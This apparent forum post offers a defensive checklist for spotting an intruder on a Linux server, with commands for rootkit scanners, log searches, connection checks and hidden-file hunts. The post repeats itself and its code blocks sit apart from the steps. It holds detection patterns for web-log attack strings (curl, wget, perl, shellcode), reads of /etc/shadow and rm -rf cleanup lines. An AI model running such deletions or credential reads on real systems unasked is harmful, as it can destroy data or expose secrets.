Tweet
Advise: this are steps recompiled from the network and a from some books, these were not done by me.
Hello..
I have a few incomplete steps to see if I got some intruder in my Linux system.. But i really would like to have all your suggestions to make a good doc about this matter, so please, post your tips and tricks about this subject.
1.- Download and run Rkhunter & Chkrootkit
2.- Run "w", and "netstat -nalp |grep "SHPORTHERE" to see whos connected using SSH
3.- Search for ssh and ftp accepted logins.
Code:
4.- Watch current connections and scan your ports.
Code:
5.- Search for suspicious content on common explotable dirs.
Code:
6.- Checking for anomalies on this files.
Code:
7.- Search for new users at sudoers, check wtmp and telnet is not running.
Code:
8.- Find bash history files
Code:
9 .- Verify the Crontab table
Code:
10 .- Update the slocate database and search for exploits.
Code:
For cPanel servers:
Code:
For Ensim servers:
Code:
Search for shell code:
Code:
11.- Search for hidden dirs
Code:
12.- Search for perl-scripts running
Code:
13 .- Checking nobody user and open files.
Code:
Please, add your tips and tricks about this
Hello..
I have a few incomplete steps to see if I got some intruder in my Linux system.. But i really would like to have all your suggestions to make a good doc about this matter, so please, post your tips and tricks about this subject.
1.- Download and run Rkhunter & Chkrootkit
2.- Run "w", and "netstat -nalp |grep "SHPORTHERE" to see whos connected using SSH
3.- Search for ssh and ftp accepted logins.
Code:
Code:
last cat /var/log/secure* | grep ssh | grep Accept cat /var/log/secure* |grep ftp |grep Accept less /var/log/messages | grep ftp
Code:
Code:
netstat -nalp nmap 1-65535 localhost
Code:
Code:
rm -rf /tmp/sess* rm -rf /var/dos-* rm -rf /var/tmp/ssh-* rm -rf /var/tmp/dos-* ls /tmp -lab ls /var/tmp -labR ls /dev/shm -labR ls /usr/local/apache/proxy -labR ls /usr/local/samba -labR
Code:
Code:
less /etc/passwd less /etc/shadow less /etc/groups
Code:
Code:
cat /etc/sudoers who /var/log/wtmp cat /etc/xinetd.d/telnet
Code:
Code:
find '/' -iname .bash_history
Code:
Code:
crontab -l
Code:
Code:
updatedb &
Code:
Code:
egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20' /usr/local/apache/logs/* egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20' /home/*/statistics/logs/*
Code:
Code:
egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20'/home/virtual/site*/fst/var/log/httpd/*
Code:
Code:
cat /path/of/your/web/logs/* |grep "/x90/"
Code:
Code:
locate "..." locate ".. " rlocate " .." locate ". " locate " ."
Code:
Code:
ps -aux | grep perl
Code:
Code:
service httpd stop lsof -u nobody
